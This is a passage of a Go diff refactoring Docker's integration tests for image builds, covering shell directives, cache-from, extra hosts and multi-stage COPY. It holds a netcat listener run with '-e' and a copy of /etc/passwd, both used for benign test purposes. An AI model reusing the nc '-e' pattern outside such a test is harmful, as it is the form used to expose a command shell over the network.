ctx.addFile("Dockerfile", bomDockerfile) - c.Assert(err, check.IsNil) - _, err = buildImageFromContext(name, ctx, true) - c.Assert(err, check.IsNil) + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", string(bomDockerfile)), + )) } // Test case for UTF-8 BOM in .dockerignore, related to #23221 @@ -6827,31 +5202,19 @@ func (s *DockerSuite) TestBuildWithUTF8BOMDockerignore(c *check.C) { RUN ls /tmp/.dockerignore` dockerignore := []byte("./Dockerfile\n") bomDockerignore := append([]byte{0xEF, 0xBB, 0xBF}, dockerignore...) - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - }) - c.Assert(err, check.IsNil) - defer ctx.Close() - err = ctx.addFile(".dockerignore", bomDockerignore) - c.Assert(err, check.IsNil) - _, err = buildImageFromContext(name, ctx, true) - if err != nil { - c.Fatal(err) - } + buildImageSuccessfully(c, name, build.WithBuildContext(c, + build.WithFile("Dockerfile", dockerfile), + build.WithFile(".dockerignore", string(bomDockerignore)), + )) } // #22489 Shell test to confirm config gets updated correctly func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) { name := "testbuildshellupdatesconfig" + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM `+minimalBaseImage()+` + SHELL ["foo", "-bar"]`)) expected := `["foo","-bar","#(nop) ","SHELL [foo -bar]"]` - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` - SHELL ["foo", "-bar"]`, - true) - if err != nil { - c.Fatal(err) - } res := inspectFieldJSON(c, name, "ContainerConfig.Cmd") if res != expected { c.Fatalf("%s, expected %s", res, expected) @@ -6866,32 +5229,28 @@ func (s *DockerSuite) TestBuildShellUpdatesConfig(c *check.C) { func (s *DockerSuite) TestBuildShellMultiple(c *check.C) { name := "testbuildshellmultiple" - _, out, _, err := buildImageWithStdoutStderr(name, - `FROM busybox + result := buildImage(name, build.WithDockerfile(`FROM busybox RUN echo defaultshell SHELL ["echo"] RUN echoshell SHELL ["ls"] RUN -l - CMD -l`, - true) - if err != nil { - c.Fatal(err) - } + CMD -l`)) + result.Assert(c, icmd.Success) // Must contain 'defaultshell' twice - if len(strings.Split(out, "defaultshell")) != 3 { - c.Fatalf("defaultshell should have appeared twice in %s", out) + if len(strings.Split(result.Combined(), "defaultshell")) != 3 { + c.Fatalf("defaultshell should have appeared twice in %s", result.Combined()) } // Must contain 'echoshell' twice - if len(strings.Split(out, "echoshell")) != 3 { - c.Fatalf("echoshell should have appeared twice in %s", out) + if len(strings.Split(result.Combined(), "echoshell")) != 3 { + c.Fatalf("echoshell should have appeared twice in %s", result.Combined()) } // Must contain "total " (part of ls -l) - if !strings.Contains(out, "total ") { - c.Fatalf("%s should have contained 'total '", out) + if !strings.Contains(result.Combined(), "total ") { + c.Fatalf("%s should have contained 'total '", result.Combined()) } // A container started from the image uses the shell-form CMD. @@ -6906,15 +5265,9 @@ func (s *DockerSuite) TestBuildShellMultiple(c *check.C) { func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) { name := "testbuildshellentrypoint" - _, err := buildImage(name, - `FROM busybox + buildImageSuccessfully(c, name, build.WithDockerfile(`FROM busybox SHELL ["ls"] - ENTRYPOINT -l`, - true) - if err != nil { - c.Fatal(err) - } - + ENTRYPOINT -l`)) // A container started from the image uses the shell-form ENTRYPOINT. // Shell is ls. ENTRYPOINT is -l. So should contain 'total '. outrun, _ := dockerCmd(c, "run", "--rm", name) @@ -6926,43 +5279,26 @@ func (s *DockerSuite) TestBuildShellEntrypoint(c *check.C) { // #22489 Shell test to confirm shell is inherited in a subsequent build func (s *DockerSuite) TestBuildShellInherited(c *check.C) { name1 := "testbuildshellinherited1" - _, err := buildImage(name1, - `FROM busybox - SHELL ["ls"]`, - true) - if err != nil { - c.Fatal(err) - } - + buildImageSuccessfully(c, name1, build.WithDockerfile(`FROM busybox + SHELL ["ls"]`)) name2 := "testbuildshellinherited2" - _, out, _, err := buildImageWithStdoutStderr(name2, - `FROM `+name1+` - RUN -l`, - true) - if err != nil { - c.Fatal(err) - } - - // ls -l has "total " followed by some number in it, ls without -l does not. - if !strings.Contains(out, "total ") { - c.Fatalf("Should have seen total in 'ls -l'.\n%s", out) - } + buildImage(name2, build.WithDockerfile(`FROM `+name1+` + RUN -l`)).Assert(c, icmd.Expected{ + // ls -l has "total " followed by some number in it, ls without -l does not. + Out: "total ", + }) } // #22489 Shell test to confirm non-JSON doesn't work func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) { name := "testbuildshellnotjson" - _, err := buildImage(name, - `FROM `+minimalBaseImage()+` + buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+` sHeLl exec -form`, // Casing explicit to ensure error is upper-cased. - true) - if err == nil { - c.Fatal("Image build should have failed") - } - if !strings.Contains(err.Error(), "SHELL requires the arguments to be in JSON form") { - c.Fatal("Error didn't indicate that arguments must be in JSON form") - } + )).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: "SHELL requires the arguments to be in JSON form", + }) } // #22489 Windows shell test to confirm native is powershell if executing a PS command @@ -6970,17 +5306,11 @@ func (s *DockerSuite) TestBuildShellNotJSON(c *check.C) { func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildshellpowershell" - _, out, err := buildImageWithOut(name, - `FROM `+minimalBaseImage()+` + buildImage(name, build.WithDockerfile(`FROM `+minimalBaseImage()+` SHELL ["powershell", "-command"] - RUN Write-Host John`, - true) - if err != nil { - c.Fatal(err) - } - if !strings.Contains(out, "\nJohn\n") { - c.Fatalf("Line with 'John' not found in output %q", out) - } + RUN Write-Host John`)).Assert(c, icmd.Expected{ + Out: "\nJohn\n", + }) } // Verify that escape is being correctly applied to words when escape directive is not \. @@ -6988,48 +5318,32 @@ func (s *DockerSuite) TestBuildShellWindowsPowershell(c *check.C) { func (s *DockerSuite) TestBuildEscapeNotBackslashWordTest(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildescapenotbackslashwordtesta" - _, out, err := buildImageWithOut(name, - `# escape= `+"`"+` + buildImage(name, build.WithDockerfile(`# escape= `+"`"+` FROM `+minimalBaseImage()+` WORKDIR c:\windows - RUN dir /w`, - true) - if err != nil { - c.Fatal(err) - } - if !strings.Contains(strings.ToLower(out), "[system32]") { - c.Fatalf("Line with '[windows]' not found in output %q", out) - } + RUN dir /w`)).Assert(c, icmd.Expected{ + Out: "[System32]", + }) name = "testbuildescapenotbackslashwordtestb" - _, out, err = buildImageWithOut(name, - `# escape= `+"`"+` + buildImage(name, build.WithDockerfile(`# escape= `+"`"+` FROM `+minimalBaseImage()+` SHELL ["powershell.exe"] WORKDIR c:\foo ADD Dockerfile c:\foo\ - RUN dir Dockerfile`, - true) - if err != nil { - c.Fatal(err) - } - if !strings.Contains(strings.ToLower(out), "-a----") { - c.Fatalf("Line with '-a----' not found in output %q", out) - } - + RUN dir Dockerfile`)).Assert(c, icmd.Expected{ + Out: "-a----", + }) } // #22868. Make sure shell-form CMD is marked as escaped in the config of the image func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) { testRequires(c, DaemonIsWindows) name := "testbuildcmdshellescaped" - _, err := buildImage(name, ` + buildImageSuccessfully(c, name, build.WithDockerfile(` FROM `+minimalBaseImage()+` CMD "ipconfig" - `, true) - if err != nil { - c.Fatal(err) - } + `)) res := inspectFieldJSON(c, name, "Config.ArgsEscaped") if res != "true" { c.Fatalf("CMD did not update Config.ArgsEscaped on image: %v", res) @@ -7046,13 +5360,12 @@ func (s *DockerSuite) TestBuildCmdShellArgsEscaped(c *check.C) { // Test case for #24912. func (s *DockerSuite) TestBuildStepsWithProgress(c *check.C) { name := "testbuildstepswithprogress" - totalRun := 5 - _, out, err := buildImageWithOut(name, "FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun), true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun)) + result := buildImage(name, build.WithDockerfile("FROM busybox\n"+strings.Repeat("RUN echo foo\n", totalRun))) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, fmt.Sprintf("Step 1/%d : FROM busybox", 1+totalRun)) for i := 2; i <= 1+totalRun; i++ { - c.Assert(out, checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun)) + c.Assert(result.Combined(), checker.Contains, fmt.Sprintf("Step %d/%d : RUN echo foo", i, 1+totalRun)) } } @@ -7060,18 +5373,40 @@ func (s *DockerSuite) TestBuildWithFailure(c *check.C) { name := "testbuildwithfailure" // First test case can only detect `nobody` in runtime so all steps will show up - buildCmd := "FROM busybox\nRUN nobody" - _, stdout, _, err := buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(stdout, checker.Contains, "Step 2/2 : RUN nobody") + dockerfile := "FROM busybox\nRUN nobody" + result := buildImage(name, build.WithDockerfile(dockerfile)) + c.Assert(result.Error, checker.NotNil) + c.Assert(result.Stdout(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Stdout(), checker.Contains, "Step 2/2 : RUN nobody") // Second test case `FFOM` should have been detected before build runs so no steps - buildCmd = "FFOM nobody\nRUN nobody" - _, stdout, _, err = buildImageWithStdoutStderr(name, buildCmd, false, "--force-rm", "--rm") - c.Assert(err, checker.NotNil) - c.Assert(stdout, checker.Not(checker.Contains), "Step 1/2 : FROM busybox") - c.Assert(stdout, checker.Not(checker.Contains), "Step 2/2 : RUN nobody") + dockerfile = "FFOM nobody\nRUN nobody" + result = buildImage(name, build.WithDockerfile(dockerfile)) + c.Assert(result.Error, checker.NotNil) + c.Assert(result.Stdout(), checker.Not(checker.Contains), "Step 1/2 : FROM busybox") + c.Assert(result.Stdout(), checker.Not(checker.Contains), "Step 2/2 : RUN nobody") +} + +func (s *DockerSuite) TestBuildCacheFromEqualDiffIDsLength(c *check.C) { + dockerfile := ` + FROM busybox + RUN echo "test" + ENTRYPOINT ["sh"]` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "Dockerfile": dockerfile, + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, "build1") + + // rebuild with cache-from + result := cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, "build2") + c.Assert(id1, checker.Equals, id2) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2) } func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { @@ -7081,29 +5416,30 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { ENV FOO=bar ADD baz / RUN touch bax` - ctx, err := fakeContext(dockerfile, map[string]string{ - "Dockerfile": dockerfile, - "baz": "baz", - }) - c.Assert(err, checker.IsNil) + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "Dockerfile": dockerfile, + "baz": "baz", + })) defer ctx.Close() - id1, err := buildImageFromContext("build1", ctx, true) - c.Assert(err, checker.IsNil) + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + id1 := getIDByName(c, "build1") // rebuild with cache-from - id2, out, err := buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result := cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 := getIDByName(c, "build2") c.Assert(id1, checker.Equals, id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) - dockerCmd(c, "rmi", "build2") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3) + cli.DockerCmd(c, "rmi", "build2") // no cache match with unknown source - id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=nosuchtag") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=nosuchtag"), build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, "build2") c.Assert(id1, checker.Not(checker.Equals), id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 0) - dockerCmd(c, "rmi", "build2") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 0) + cli.DockerCmd(c, "rmi", "build2") // clear parent images tempDir, err := ioutil.TempDir("", "test-build-cache-from-") @@ -7112,31 +5448,31 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { } defer os.RemoveAll(tempDir) tempFile := filepath.Join(tempDir, "img.tar") - dockerCmd(c, "save", "-o", tempFile, "build1") - dockerCmd(c, "rmi", "build1") - dockerCmd(c, "load", "-i", tempFile) - parentID, _ := dockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1") + cli.DockerCmd(c, "save", "-o", tempFile, "build1") + cli.DockerCmd(c, "rmi", "build1") + cli.DockerCmd(c, "load", "-i", tempFile) + parentID := cli.DockerCmd(c, "inspect", "-f", "{{.Parent}}", "build1").Combined() c.Assert(strings.TrimSpace(parentID), checker.Equals, "") // cache still applies without parents - id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, "build2") c.Assert(id1, checker.Equals, id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) - history1, _ := dockerCmd(c, "history", "-q", "build2") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3) + history1 := cli.DockerCmd(c, "history", "-q", "build2").Combined() // Retry, no new intermediate images - id3, out, err := buildImageFromContextWithOut("build3", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build3", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id3 := getIDByName(c, "build3") c.Assert(id1, checker.Equals, id3) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 3) - history2, _ := dockerCmd(c, "history", "-q", "build3") + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 3) + history2 := cli.DockerCmd(c, "history", "-q", "build3").Combined() c.Assert(history1, checker.Equals, history2) - dockerCmd(c, "rmi", "build2") - dockerCmd(c, "rmi", "build3") - dockerCmd(c, "rmi", "build1") - dockerCmd(c, "load", "-i", tempFile) + cli.DockerCmd(c, "rmi", "build2") + cli.DockerCmd(c, "rmi", "build3") + cli.DockerCmd(c, "rmi", "build1") + cli.DockerCmd(c, "load", "-i", tempFile) // Modify file, everything up to last command and layers are reused dockerfile = ` @@ -7147,13 +5483,13 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { err = ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(dockerfile), 0644) c.Assert(err, checker.IsNil) - id2, out, err = buildImageFromContextWithOut("build2", ctx, true, "--cache-from=build1") - c.Assert(err, checker.IsNil) + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + id2 = getIDByName(c, "build2") c.Assert(id1, checker.Not(checker.Equals), id2) - c.Assert(strings.Count(out, "Using cache"), checker.Equals, 2) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2) - layers1Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1") - layers2Str, _ := dockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2") + layers1Str := cli.DockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build1").Combined() + layers2Str := cli.DockerCmd(c, "inspect", "-f", "{{json .RootFS.Layers}}", "build2").Combined() var layers1 []string var layers2 []string @@ -7167,16 +5503,40 @@ func (s *DockerSuite) TestBuildCacheFrom(c *check.C) { c.Assert(layers1[len(layers1)-1], checker.Not(checker.Equals), layers2[len(layers1)-1]) } +func (s *DockerSuite) TestBuildMultiStageCache(c *check.C) { + testRequires(c, DaemonIsLinux) // All tests that do save are skipped in windows + dockerfile := ` + FROM busybox + ADD baz / + FROM busybox + ADD baz /` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "Dockerfile": dockerfile, + "baz": "baz", + })) + defer ctx.Close() + + result := cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + // second part of dockerfile was a repeat of first so should be cached + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 1) + + result = cli.BuildCmd(c, "build2", cli.WithFlags("--cache-from=build1"), build.WithExternalBuildContext(ctx)) + // now both parts of dockerfile should be cached + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 2) +} + func (s *DockerSuite) TestBuildNetNone(c *check.C) { testRequires(c, DaemonIsLinux) - name := "testbuildnetnone" - _, out, err := buildImageWithOut(name, ` + buildImage(name, cli.WithFlags("--network=none"), build.WithDockerfile(` FROM busybox RUN ping -c 1 8.8.8.8 - `, true, "--network=none") - c.Assert(err, checker.NotNil) - c.Assert(out, checker.Contains, "unreachable") + `)).Assert(c, icmd.Expected{ + ExitCode: 1, + Out: "unreachable", + }) } func (s *DockerSuite) TestBuildNetContainer(c *check.C) { @@ -7185,85 +5545,446 @@ func (s *DockerSuite) TestBuildNetContainer(c *check.C) { id, _ := dockerCmd(c, "run", "--hostname", "foobar", "-d", "busybox", "nc", "-ll", "-p", "1234", "-e", "hostname") name := "testbuildnetcontainer" - out, err := buildImage(name, ` + buildImageSuccessfully(c, name, cli.WithFlags("--network=container:"+strings.TrimSpace(id)), + build.WithDockerfile(` FROM busybox RUN nc localhost 1234 > /otherhost - `, true, "--network=container:"+strings.TrimSpace(id)) - c.Assert(err, checker.IsNil, check.Commentf("out: %v", out)) + `)) host, _ := dockerCmd(c, "run", "testbuildnetcontainer", "cat", "/otherhost") c.Assert(strings.TrimSpace(host), check.Equals, "foobar") } -func (s *DockerSuite) TestBuildSquashParent(c *check.C) { - testRequires(c, ExperimentalDaemon) - dockerFile := ` +func (s *DockerSuite) TestBuildWithExtraHost(c *check.C) { + testRequires(c, DaemonIsLinux) + + name := "testbuildwithextrahost" + buildImageSuccessfully(c, name, + cli.WithFlags( + "--add-host", "foo:127.0.0.1", + "--add-host", "bar:127.0.0.1", + ), + build.WithDockerfile(` + FROM busybox + RUN ping -c 1 foo + RUN ping -c 1 bar + `)) +} + +func (s *DockerSuite) TestBuildWithExtraHostInvalidFormat(c *check.C) { + testRequires(c, DaemonIsLinux) + dockerfile := ` FROM busybox - RUN echo hello > /hello - RUN echo world >> /hello - RUN echo hello > /remove_me - ENV HELLO world - RUN rm /remove_me - ` - // build and get the ID that we can use later for history comparison - origID, err := buildImage("test", dockerFile, false) - c.Assert(err, checker.IsNil) + RUN ping -c 1 foo` - // build with squash - id, err := buildImage("test", dockerFile, true, "--squash") - c.Assert(err, checker.IsNil) + testCases := []struct { + testName string + dockerfile string + buildFlag string + }{ + {"extra_host_missing_ip", dockerfile, "--add-host=foo"}, + {"extra_host_missing_ip_with_delimiter", dockerfile, "--add-host=foo:"}, + {"extra_host_missing_hostname", dockerfile, "--add-host=:127.0.0.1"}, + {"extra_host_invalid_ipv4", dockerfile, "--add-host=foo:101.10.2"}, + {"extra_host_invalid_ipv6", dockerfile, "--add-host=foo:2001::1::3F"}, + } - out, _ := dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "cat /hello") - c.Assert(strings.TrimSpace(out), checker.Equals, "hello\nworld") + for _, tc := range testCases { + result := buildImage(tc.testName, cli.WithFlags(tc.buildFlag), build.WithDockerfile(tc.dockerfile)) + result.Assert(c, icmd.Expected{ + ExitCode: 125, + }) + } - dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", "[ ! -f /remove_me ]") - dockerCmd(c, "run", "--rm", id, "/bin/sh", "-c", `[ "$(echo $HELLO)" == "world" ]`) +} - // make sure the ID produced is the ID of the tag we specified - inspectID, err := inspectImage("test", ".ID") - c.Assert(err, checker.IsNil) - c.Assert(inspectID, checker.Equals, id) +func (s *DockerSuite) TestBuildContChar(c *check.C) { + name := "testbuildcontchar" - origHistory, _ := dockerCmd(c, "history", origID) - testHistory, _ := dockerCmd(c, "history", "test") + buildImage(name, build.WithDockerfile(`FROM busybox\`)).Assert(c, icmd.Expected{ + Out: "Step 1/1 : FROM busybox", + }) - splitOrigHistory := strings.Split(strings.TrimSpace(origHistory), "\n") - splitTestHistory := strings.Split(strings.TrimSpace(testHistory), "\n") - c.Assert(len(splitTestHistory), checker.Equals, len(splitOrigHistory)+1) + result := buildImage(name, build.WithDockerfile(`FROM busybox + RUN echo hi \`)) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi\n") - out, err = inspectImage(id, "len .RootFS.Layers") - c.Assert(err, checker.IsNil) - c.Assert(strings.TrimSpace(out), checker.Equals, "3") + result = buildImage(name, build.WithDockerfile(`FROM busybox + RUN echo hi \\`)) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi \\\n") + + result = buildImage(name, build.WithDockerfile(`FROM busybox + RUN echo hi \\\`)) + result.Assert(c, icmd.Success) + c.Assert(result.Combined(), checker.Contains, "Step 1/2 : FROM busybox") + c.Assert(result.Combined(), checker.Contains, "Step 2/2 : RUN echo hi \\\\\n") } -func (s *DockerSuite) TestBuildContChar(c *check.C) { - name := "testbuildcontchar" +func (s *DockerSuite) TestBuildMultiStageCopyFromSyntax(c *check.C) { + dockerfile := ` + FROM busybox AS first + COPY foo bar - _, out, err := buildImageWithOut(name, - `FROM busybox\`, true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/1 : FROM busybox") + FROM busybox + %s + COPY baz baz + RUN echo mno > baz/cc - _, out, err = buildImageWithOut(name, - `FROM busybox - RUN echo hi \`, true) - c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi\n") + FROM busybox + COPY bar / + COPY --from=1 baz sub/ + COPY --from=0 bar baz + COPY --from=first bar bay` + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(fmt.Sprintf(dockerfile, "")), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + "bar": "def", + "baz/aa": "ghi", + "baz/bb": "jkl", + })) + defer ctx.Close() - _, out, err = buildImageWithOut(name, - `FROM busybox - RUN echo hi \\`, true) + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + cli.DockerCmd(c, "run", "build1", "cat", "bar").Assert(c, icmd.Expected{Out: "def"}) + cli.DockerCmd(c, "run", "build1", "cat", "sub/aa").Assert(c, icmd.Expected{Out: "ghi"}) + cli.DockerCmd(c, "run", "build1", "cat", "sub/cc").Assert(c, icmd.Expected{Out: "mno"}) + cli.DockerCmd(c, "run", "build1", "cat", "baz").Assert(c, icmd.Expected{Out: "abc"}) + cli.DockerCmd(c, "run", "build1", "cat", "bay").Assert(c, icmd.Expected{Out: "abc"}) + + result := cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx)) + + // all commands should be cached + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 7) + c.Assert(getIDByName(c, "build1"), checker.Equals, getIDByName(c, "build2")) + + err := ioutil.WriteFile(filepath.Join(ctx.Dir, "Dockerfile"), []byte(fmt.Sprintf(dockerfile, "COPY baz/aa foo")), 0644) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\n") - _, out, err = buildImageWithOut(name, - `FROM busybox - RUN echo hi \\\`, true) + // changing file in parent block should not affect last block + result = cli.BuildCmd(c, "build3", build.WithExternalBuildContext(ctx)) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 5) + + err = ioutil.WriteFile(filepath.Join(ctx.Dir, "foo"), []byte("pqr"), 0644) c.Assert(err, checker.IsNil) - c.Assert(out, checker.Contains, "Step 1/2 : FROM busybox") - c.Assert(out, checker.Contains, "Step 2/2 : RUN echo hi \\\\\n") + + // changing file in parent block should affect both first and last block + result = cli.BuildCmd(c, "build4", build.WithExternalBuildContext(ctx)) + c.Assert(strings.Count(result.Combined(), "Using cache"), checker.Equals, 5) + + cli.DockerCmd(c, "run", "build4", "cat", "bay").Assert(c, icmd.Expected{Out: "pqr"}) + cli.DockerCmd(c, "run", "build4", "cat", "baz").Assert(c, icmd.Expected{Out: "pqr"}) +} + +func (s *DockerSuite) TestBuildMultiStageCopyFromErrors(c *check.C) { + testCases := []struct { + dockerfile string + expectedError string + }{ + { + dockerfile: ` + FROM busybox + COPY --from=foo foo bar`, + expectedError: "invalid from flag value foo", + }, + { + dockerfile: ` + FROM busybox + COPY --from=0 foo bar`, + expectedError: "invalid from flag value 0: refers to current build stage", + }, + { + dockerfile: ` + FROM busybox AS foo + COPY --from=bar foo bar`, + expectedError: "invalid from flag value bar", + }, + { + dockerfile: ` + FROM busybox AS 1 + COPY --from=1 foo bar`, + expectedError: "invalid name for build stage", + }, + } + + for _, tc := range testCases { + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(tc.dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + + cli.Docker(cli.Build("build1"), build.WithExternalBuildContext(ctx)).Assert(c, icmd.Expected{ + ExitCode: 1, + Err: tc.expectedError, + }) + + ctx.Close() + } +} + +func (s *DockerSuite) TestBuildMultiStageMultipleBuilds(c *check.C) { + dockerfile := ` + FROM busybox + COPY foo bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + dockerfile = ` + FROM build1:latest AS foo + FROM busybox + COPY --from=foo bar / + COPY foo /` + ctx = fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "def", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build2", build.WithExternalBuildContext(ctx)) + + out := cli.DockerCmd(c, "run", "build2", "cat", "bar").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "abc") + out = cli.DockerCmd(c, "run", "build2", "cat", "foo").Combined() + c.Assert(strings.TrimSpace(out), check.Equals, "def") +} + +func (s *DockerSuite) TestBuildMultiStageImplicitFrom(c *check.C) { + dockerfile := ` + FROM busybox + COPY --from=busybox /etc/passwd /mypasswd + RUN cmp /etc/passwd /mypasswd` + + if DaemonIsWindows() { + dockerfile = ` + FROM busybox + COPY --from=busybox License.txt foo` + } + + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + ) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + if DaemonIsWindows() { + out := cli.DockerCmd(c, "run", "build1", "cat", "License.txt").Combined() + c.Assert(len(out), checker.GreaterThan, 10) + out2 := cli.DockerCmd(c, "run", "build1", "cat", "foo").Combined() + c.Assert(out, check.Equals, out2) + } +} + +func (s *DockerRegistrySuite) TestBuildMultiStageImplicitPull(c *check.C) { + repoName := fmt.Sprintf("%v/dockercli/testf", privateRegistryURL) + + dockerfile := ` + FROM busybox + COPY foo bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + defer ctx.Close() + + cli.BuildCmd(c, repoName, build.WithExternalBuildContext(ctx)) + + cli.DockerCmd(c, "push", repoName) + cli.DockerCmd(c, "rmi", repoName) + + dockerfile = ` + FROM busybox + COPY --from=%s bar baz` + + ctx = fakecontext.New(c, "", fakecontext.WithDockerfile(fmt.Sprintf(dockerfile, repoName))) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + cli.Docker(cli.Args("run", "build1", "cat", "baz")).Assert(c, icmd.Expected{Out: "abc"}) +} + +func (s *DockerSuite) TestBuildMultiStageNameVariants(c *check.C) { + dockerfile := ` + FROM busybox as foo + COPY foo / + FROM foo as foo1 + RUN echo 1 >> foo + FROM foo as foO2 + RUN echo 2 >> foo + FROM foo + COPY --from=foo1 foo f1 + COPY --from=FOo2 foo f2 + ` // foo2 case also tests that names are case insensitive + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "bar", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + cli.Docker(cli.Args("run", "build1", "cat", "foo")).Assert(c, icmd.Expected{Out: "bar"}) + cli.Docker(cli.Args("run", "build1", "cat", "f1")).Assert(c, icmd.Expected{Out: "bar1"}) + cli.Docker(cli.Args("run", "build1", "cat", "f2")).Assert(c, icmd.Expected{Out: "bar2"}) +} + +func (s *DockerSuite) TestBuildMultiStageMultipleBuildsWindows(c *check.C) { + testRequires(c, DaemonIsWindows) + dockerfile := ` + FROM ` + testEnv.PlatformDefaults.BaseImage + ` + COPY foo c:\\bar` + ctx := fakecontext.New(c, "", + fakecontext.WithDockerfile(dockerfile), + fakecontext.WithFiles(map[string]string{ + "foo": "abc", + })) + defer ctx.Close() + + cli.BuildCmd(c, "build1", build.WithExternalBuildContext(ctx)) + + 